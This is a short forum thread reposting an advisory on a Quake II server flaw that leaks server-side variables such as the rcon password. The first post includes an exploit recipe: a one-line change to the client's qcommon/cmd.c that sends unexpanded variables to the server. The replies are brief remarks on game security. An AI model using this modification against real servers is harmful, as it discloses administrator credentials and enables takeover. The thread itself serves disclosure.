Results 1 to 3 of 3

Thread: Vulnerability: id Software Quake II Server Remote Information Disclosure

  1. #1
    Fastest Thing Alive s0nIc's Avatar
    Join Date
    Sep 2001
    Location
    Sydney
    Posts
    1,584

    Exclamation Vulnerability: id Software Quake II Server Remote Information Disclosure

    A vulnerability has been reported in some versions of the Quake II server.

    While variable expansion is normally performed on the client side, a modified client may pass unexpanded variables such as $rcon_password to the server. The server will expand these variables within it's local context, potentially leaking sensitive information to the remote attacker.

    Remote: Yes

    Exploit: Redix has contributed exploit details:

    you must modify your q2 client, that the client will not replace the $... variables in says
    quick hack:
    in qcommon/cmd.c
    change the line
    Cmd_TokenizeString (text, true);
    to
    Cmd_TokenizeString( text, false);

    Threshold

  2. #2
    pretty cool how people figure these things out
    \"Drastic times call for drastic measures.\"

  3. #3
    Senior Member cwk9's Avatar
    Join Date
    Feb 2002
    Posts
    1,207
    Games are an often overlooked security risk. Although it’s mostly limited to crashing you computer or dropping you form the server but still something to be mindful of.
    Its not software piracy. I’m just making multiple off site backups.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •